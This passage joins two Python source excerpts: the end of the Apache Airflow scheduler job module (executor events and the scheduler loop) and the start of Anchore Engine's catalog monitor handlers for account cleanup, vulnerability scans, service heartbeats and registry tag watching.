TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs back to the scheduled state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
# pylint: disable=too-many-nested-blocks
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state in (State.FAILED, State.SUCCESS):
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception: # pylint: disable=broad-except
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested %d SimpleDAGs", len(simple_dags))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files have been processed %d times",
self.num_runs)
break
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e: # pylint: disable=broad-except
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
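# Illustrative sketch (not part of the original module): running the scheduler
# job directly, assuming a fully configured Airflow environment.
#
#   job = SchedulerJob(subdir=settings.DAGS_FOLDER, num_runs=-1)
#   job.run()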
|
__init__.py
|
import json
import os
import copy
import threading
import time
import pkg_resources
from sqlalchemy.exc import IntegrityError
# anchore modules
import anchore_engine.clients.anchoreio
import anchore_engine.common.helpers
import anchore_engine.common.images
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services import simplequeue
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.clients.services.common
from anchore_engine.clients import docker_registry
from anchore_engine import db
from anchore_engine.db import db_catalog_image, db_policybundle, db_queues, db_registries, db_subscriptions, \
db_accounts, db_anchore, db_services, db_events, AccountStates, AccountTypes, ArchiveTransitionRule
from anchore_engine.subsys import notifications, taskstate, logger, archive, object_store
from anchore_engine.services.catalog import catalog_impl
import anchore_engine.subsys.events as events
from anchore_engine.utils import AnchoreException
from anchore_engine.services.catalog.exceptions import TagManifestParseError, TagManifestNotFoundError, PolicyBundleValidationError
from anchore_engine.service import ApiService, LifeCycleStages
from anchore_engine.common.helpers import make_policy_record
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.services.catalog import archiver
from anchore_engine.subsys.object_store.config import DEFAULT_OBJECT_STORE_MANAGER_ID, ANALYSIS_ARCHIVE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY
##########################################################
# monitor section
def do_user_resources_delete(userId):
return_object = {}
httpcode = 500
resourcemaps = [
("subscriptions", db.db_subscriptions.get_all_byuserId, catalog_impl.do_subscription_delete),
("registries", db.db_registries.get_byuserId, catalog_impl.do_registry_delete),
("evaluations", db.db_policyeval.get_all_byuserId, catalog_impl.do_evaluation_delete),
("policybundles", db.db_policybundle.get_all_byuserId, catalog_impl.do_policy_delete),
("images", db.db_catalog_image.get_all_byuserId, catalog_impl.do_image_delete),
("archive", db.db_archivemetadata.list_all_byuserId, catalog_impl.do_archive_delete),
]
limit = 2048
all_total = 0
all_deleted = 0
for resourcename,getfunc,delfunc in resourcemaps:
try:
deleted = 0
total = 0
with db.session_scope() as dbsession:
records = getfunc(userId, session=dbsession, limit=limit)
total = len(records)
for record in records:
delfunc(userId, record, dbsession, force=True)
deleted = deleted + 1
return_object['total_{}'.format(resourcename)] = total
return_object['total_{}_deleted'.format(resourcename)] = deleted
all_total = all_total + total
all_deleted = all_deleted + deleted
if total or deleted:
logger.debug("deleted {} / {} {} records for user {}".format(deleted, total, resourcename, userId))
except Exception as err:
logger.warn("failed to delete resources in {} for user {}, will continue and try again - exception: {}".format(resourcename, userId, err))
return_object['all_total'] = all_total
return_object['all_deleted'] = all_deleted
httpcode = 200
return(return_object, httpcode)
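# Example of the return payload above (counts are hypothetical; one pair of
# keys is emitted per resource type in resourcemaps):
#   ({'total_subscriptions': 2, 'total_subscriptions_deleted': 2, ...,
#     'all_total': 9, 'all_deleted': 9}, 200)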
def handle_account_resource_cleanup(*args, **kwargs):
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
# Iterate over all deleted account records and perform resource cleanup for each account.
# If there are no longer any resources associated with the account id, finally delete the account record itself.
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.deleting, include_service=False)
for account in accounts:
userId = account['name']
logger.debug("Inspecting account {} for resource cleanup tasks".format(userId))
try:
return_object, httpcode = do_user_resources_delete(userId)
logger.debug("Resources for deleted account cleaned-up: {} - {}".format(return_object, httpcode))
if return_object.get('all_total', None) == 0 and return_object.get('all_deleted', None) == 0:
logger.debug("Resources for pending deleted user {} cleared - deleting account".format(userId))
with db.session_scope() as session:
mgr = manager_factory.for_session(session)
mgr.delete_account(userId)
else:
logger.debug("resources for pending deleted user {} not entirely cleared this cycle".format(userId))
except Exception as err:
raise Exception("failed to delete user {} resources - exception: {}".format(userId, err))
except Exception as err:
logger.warn("failure in handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
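# Note on the monitor handlers in this section, derived from the code: each
# handler receives its monitor thread record via kwargs['mythread'] and stores
# its return status in 'last_return'; most read 'taskType' for logging and
# report an 'anchore_monitor_runtime_seconds' summary metric when metrics
# collection is enabled.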
def handle_vulnerability_scan(*args, **kwargs):
global feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine'])
if not all_ready:
logger.debug("FIRING DONE: feed syncer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# vulnerability scans
doperform = False
vuln_subs = []
for subscription_type in ['vuln_update']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in vuln_subs:
vuln_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in vuln_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
current_imageDigest = image_records[0]['imageDigest']
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
doperform = True
if doperform:
logger.debug("calling vuln scan perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_vulnerability_scan(userId, imageDigest, dbsession, scantag=fulltag, force_refresh=False, is_current=(imageDigest==current_imageDigest))
except Exception as err:
logger.warn("vulnerability scan failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in feed sync handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_service_watcher(*args, **kwargs):
# global latest_service_records
cycle_timer = kwargs['mythread']['cycle_timer']
max_service_heartbeat_timer = 300
max_service_orphaned_timer = 3600
max_service_cleanup_timer = 86400
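# These thresholds drive the transitions below: a service with no heartbeat
# for max_service_heartbeat_timer seconds is marked down, after
# max_service_orphaned_timer seconds it is marked orphaned, and after
# max_service_cleanup_timer seconds its record is removed entirely.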
while (True):
logger.debug("FIRING: service watcher")
localconfig = anchore_engine.configuration.localconfig.get_config()
verify = localconfig['internal_ssl_verify']
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
event_account = anchore_engine.configuration.localconfig.ADMIN_ACCOUNT_NAME
anchore_services = db_services.get_all(session=dbsession)
# update the global latest service record dict in services.common
# latest_service_records.update({"service_records": copy.deepcopy(anchore_services)})
# fields to update each tick:
#
# heartbeat (current time)
# status (true/false)
# status_message (state of service)
# short_description(api return)
#
for service in anchore_services:
event = None
service_update_record = {}
if service['servicename'] == 'catalog' and service['hostid'] == localconfig['host_id']:
status = anchore_engine.subsys.servicestatus.get_status(service)
service_update_record.update({'heartbeat': int(time.time()), 'status': True,
'status_message': taskstate.complete_state('service_status'),
'short_description': json.dumps(status)})
else:
try:
try:
status = json.loads(service['short_description'])
except:
status = {'up': False, 'available': False}
# set to down until the response can be parsed
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status description"
try:
# NOTE: this is where any service-specific decisions based on the 'status' record could happen - now all services are the same
if status['up'] and status['available']:
if time.time() - service['heartbeat'] > max_service_heartbeat_timer:
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - disabling service".format(max_service_heartbeat_timer, service['hostid'], service['servicename']))
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_heartbeat_timer)
# Trigger an event to log the down service
event = events.ServiceDownEvent(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_heartbeat_timer))
else:
service_update_record['status'] = True
service_update_record['status_message'] = taskstate.complete_state('service_status')
try:
service_update_record['short_description'] = json.dumps(status)
except:
service_update_record['short_description'] = str(status)
else:
# handle the down state transitions
if time.time() - service['heartbeat'] > max_service_cleanup_timer:
# remove the service entirely
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - removing service".format(max_service_cleanup_timer, service['hostid'], service['servicename']))
try:
# remove the service record from DB
removed_hostid = service['hostid']
removed_servicename = service['servicename']
removed_base_url = service['base_url']
db_services.delete(removed_hostid, removed_servicename, session=dbsession)
service_update_record = None
# Trigger an event to log the removed service, only on transition
event = events.ServiceRemovedEvent(user_id=event_account, name=removed_servicename,
host=removed_hostid,
url=removed_base_url,
cause='no heartbeat from service in ({}) seconds'.format(
max_service_cleanup_timer))
except Exception as err:
logger.warn("attempt to remove service {}/{} failed - exception: {}".format(service.get('hostid'), service.get('servicename'), err))
elif time.time() - service['heartbeat'] > max_service_orphaned_timer:
# transition down service to orphaned
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - orphaning service".format(max_service_orphaned_timer, service['hostid'], service['servicename']))
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.orphaned_state('service_status')
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_orphaned_timer)
if service['status_message'] != taskstate.orphaned_state('service_status'):
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceOrphanedEvent(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_orphaned_timer))
except Exception as err:
logger.warn(
"could not get/parse service status record for service: - exception: " + str(err))
except Exception as err:
logger.warn(
"could not get service status: " + str(service) + " : exception: " + str(err) + " : " + str(
err.__dict__))
if service_update_record:
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status"
finally:
if event:
_add_event(event)
if service_update_record:
service.update(service_update_record)
try:
db_services.update_record(service, session=dbsession)
except Exception as err:
logger.warn("could not update DB: " + str(err))
logger.debug("FIRING DONE: service watcher")
try:
kwargs['mythread']['last_return'] = True
except:
pass
time.sleep(cycle_timer)
return (True)
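# Descriptive note (added comment): handle_repo_watcher walks every active 'repo_update'
# subscription per account, lists the tags of each watched repository, and adds any tag not yet
# recorded in the subscription's 'repotags' list as a new catalog image. If the subscription has
# 'autosubscribe' set, newly discovered tags also get a 'tag_update' subscription so their digest
# changes are tracked by handle_image_watcher.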
def handle_repo_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
dbfilter = {}
with db.session_scope() as dbsession:
dbfilter['subscription_type'] = 'repo_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
event = None
try:
regrepo = subscription_record['subscription_key']
if subscription_record['subscription_value']:
subscription_value = json.loads(subscription_record['subscription_value'])
if 'autosubscribe' not in subscription_value:
subscription_value['autosubscribe'] = False
if 'lookuptag' not in subscription_value:
subscription_value['lookuptag'] = 'latest'
else:
subscription_value = {'autosubscribe': False, 'lookuptag': 'latest'}
stored_repotags = subscription_value.get('repotags', [])
fulltag = regrepo + ":" + subscription_value.get('lookuptag', 'latest')
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=False,
registry_creds=(None, None))
# List tags
try:
curr_repotags = docker_registry.get_repo_tags(userId, image_info, registry_creds=registry_creds)
except AnchoreException as e:
event = events.ListTagsFail(user_id=userId, registry=image_info.get('registry', None),
repository=image_info.get('repo', None), error=e.to_dict())
raise e
autosubscribes = ['analysis_update']
if subscription_value['autosubscribe']:
autosubscribes.append("tag_update")
repotags = set(curr_repotags).difference(set(stored_repotags))
if repotags:
logger.debug("new tags to watch in repo (" + str(regrepo) + "): " + str(repotags))
added_repotags = stored_repotags
for repotag in repotags:
try:
fulltag = image_info['registry'] + "/" + image_info['repo'] + ":" + repotag
logger.debug("found new tag in repo: " + str(fulltag))
new_image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
manifest = None
try:
if 'manifest' in new_image_info:
try:
manifest = json.dumps(new_image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag,
manifest=new_image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
raise
with db.session_scope() as dbsession:
logger.debug("adding/updating image from repo scan " + str(new_image_info['fulltag']))
# add the image
image_records = catalog_impl.add_or_update_image(dbsession, userId,
new_image_info['imageId'],
tags=[new_image_info['fulltag']],
digests=[new_image_info['fulldigest']],
parentdigest=new_image_info.get('parentdigest', None),
manifest=manifest)
# add the subscription records with the configured default activations
for stype in anchore_engine.common.subscription_types:
activate = False
if stype == 'repo_update':
continue
elif stype in autosubscribes:
activate = True
db_subscriptions.add(userId, new_image_info['fulltag'], stype, {'active': activate},
session=dbsession)
added_repotags.append(repotag)
except Exception as err:
logger.warn(
"could not add discovered tag from repo (" + str(fulltag) + ") - exception: " + str(
err))
# update the subscription record with the latest successfully added image tags
with db.session_scope() as dbsession:
subscription_value['repotags'] = added_repotags
subscription_value['tagcount'] = len(added_repotags)
db_subscriptions.update(userId, regrepo, 'repo_update',
{'subscription_value': json.dumps(subscription_value)},
session=dbsession)
else:
logger.debug("no new images in watched repo (" + str(regrepo) + "): skipping")
except Exception as err:
logger.warn("failed to process repo_update subscription - exception: " + str(err))
finally:
if event:
_add_event(event)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
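# Descriptive note (added comment): handle_image_watcher checks each active 'tag_update'
# subscription by looking up the tag's current digest in the registry. If that digest is not yet
# in the catalog DB, the image is added (carrying forward annotations from the most recent prior
# digest of the tag) and a 'tag_update' notification is queued containing the previous and new
# digest lists. Registry ping failures are recorded as an 'auth_failure' state on the registry
# credential record.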
def handle_image_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
with db.session_scope() as dbsession:
dbfilter = {}
dbfilter['subscription_type'] = 'tag_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
alltags = []
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
try:
fulltag = subscription_record['subscription_key']
if fulltag not in alltags:
alltags.append(fulltag)
except Exception as err:
logger.warn("problem creating taglist for image watcher - exception: " + str(err))
for registry_record in registry_creds:
try:
registry_status = docker_registry.ping_docker_registry(registry_record)
except Exception as err:
registry_record['record_state_key'] = 'auth_failure'
registry_record['record_state_val'] = str(int(time.time()))
logger.warn("registry ping failed - exception: " + str(err))
logger.debug("checking tags for update: " + str(userId) + " : " + str(alltags))
for fulltag in alltags:
event = None
try:
logger.debug("checking image latest info from registry: " + fulltag)
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
logger.spew("checking image: got registry info: " + str(image_info))
manifest = None
try:
if 'manifest' in image_info:
try:
manifest = json.dumps(image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag, manifest=image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
raise
try:
dbfilter = {
'registry': image_info['registry'],
'repo': image_info['repo'],
'tag': image_info['tag'],
'digest': image_info['digest']
}
except Exception as err:
raise Exception("could not prepare db filter for complete lookup check - exception: " + str(err))
try:
stored_manifest = json.loads(obj_mgr.get_document(userId, 'manifest_data', image_info['digest']))
if not stored_manifest:
raise Exception("stored manifest is empty")
except Exception as err:
logger.debug("found empty/invalid stored manifest, storing new: " + str(err))
rc = obj_mgr.put_document(userId, 'manifest_data', image_info['digest'], manifest)
logger.debug("checking image: looking up image in db using dbfilter: " + str(dbfilter))
with db.session_scope() as dbsession:
record = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter, session=dbsession)
if record:
logger.debug("checking image: found match, no update, nothing to do: " + str(fulltag))
else:
logger.info(
"checking image: found latest digest for tag is not in DB: should update and queue for analysis: tag=" + str(
fulltag) + " latest_digest=" + str(dbfilter['digest']))
# get the set of existing digests
try:
last_dbfilter = {}
last_dbfilter.update(dbfilter)
last_dbfilter.pop('digest', None)
last_digests = []
last_annotations = {}
is_latest = True
with db.session_scope() as dbsession:
last_image_records = db_catalog_image.get_byimagefilter(userId, 'docker', last_dbfilter,
session=dbsession)
if last_image_records:
for last_image_record in last_image_records:
imageDigest = last_image_record['imageDigest']
for image_detail in last_image_record['image_detail']:
last_digests.append(image_detail['digest'])
# only do this (bring forward annotations) for the first found digest (last digest associated with tag)
if is_latest:
if not last_annotations and last_image_record['annotations']:
try:
if last_image_record.get('annotations', '{}'):
last_annotations.update(
json.loads(last_image_record.get('annotations', '{}')))
except:
pass
is_latest = False
except Exception as err:
logger.error(str(err))
# add and store the new image
with db.session_scope() as dbsession:
logger.debug("adding new image from tag watcher " + str(image_info))
image_records = catalog_impl.add_or_update_image(dbsession, userId, image_info['imageId'],
tags=[image_info['fulltag']],
digests=[image_info['fulldigest']],
parentdigest=image_info.get('parentdigest', None),
manifest=manifest,
annotations=last_annotations)
if image_records:
image_record = image_records[0]
else:
image_record = {}
logger.info("checking image: added new image: " + str(image_record))
new_digests = [image_info['digest']]
# construct the notification and queue
try:
npayload = {
'last_eval': last_digests,
'curr_eval': new_digests,
}
if last_annotations:
npayload['annotations'] = last_annotations
rc = notifications.queue_notification(userId, fulltag, 'tag_update', npayload)
logger.debug("queued image tag update notification: " + fulltag)
# inobj = {
# 'userId': userId,
# 'subscription_key':fulltag,
# 'notificationId': str(uuid.uuid4()),
# 'last_eval':last_digests,
# 'curr_eval':new_digests,
# }
# if not simplequeue.is_inqueue(system_user_auth, 'tag_update', inobj):
# qobj = simplequeue.enqueue(system_user_auth, 'tag_update', inobj)
# logger.debug("queued image tag update notification: " + fulltag)
except Exception as err:
logger.error("failed to queue tag update notification - exception: " + str(err))
raise err
except Exception as err:
logger.error("failed to check/update image - exception: " + str(err))
finally:
if event:
_add_event(event)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
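# Descriptive note (added comment): _add_event persists the event record and queues an
# 'event_log' notification keyed by the event level; with quiet=True (the default) any failure is
# logged and swallowed so event bookkeeping never breaks the calling watcher.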
def _add_event(event, quiet=True):
try:
with db.session_scope() as dbsession:
db_events.add(event.to_dict(), dbsession)
logger.debug("queueing event creation notification")
npayload = {'event': event.to_dict()}
rc = notifications.queue_notification(event.user_id, subscription_key=event.level,
subscription_type='event_log', payload=npayload)
except:
if quiet:
logger.exception('Ignoring error creating/notifying event: {}'.format(event))
else:
raise
def check_feedmeta_update(dbsession):
global feed_sync_updated
return (feed_sync_updated)
def check_policybundle_update(userId, dbsession):
global bundle_user_last_updated
is_updated = True
try:
last_bundle_update = 0
active_policy_record = db_policybundle.get_active_policy(userId, session=dbsession)
if active_policy_record:
last_bundle_update = active_policy_record['last_updated']
else:
logger.warn("user has no active policy - queueing just in case" + str(userId))
return (is_updated)
if userId not in bundle_user_last_updated:
bundle_user_last_updated[userId] = last_bundle_update
if last_bundle_update == bundle_user_last_updated[userId]:
logger.debug("no bundle update detected since last cycle")
is_updated = False
else:
logger.debug("bundle update detected since last cycle")
bundle_user_last_updated[userId] = last_bundle_update
is_updated = True
except Exception as err:
logger.warn("failed to get/parse active policy bundle for user (" + str(userId) + ") - exception: " + str(err))
bundle_user_last_updated[userId] = 0
is_updated = True
return (is_updated)
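# Descriptive note (added comment): handle_policyeval re-runs policy evaluation for every analyzed
# digest referenced by an active 'policy_eval' subscription, plus the most recent digest of each
# subscribed tag. check_feedmeta_update / check_policybundle_update above can detect feed or
# bundle changes, but as the TODO inside the loop notes, evaluation is currently performed
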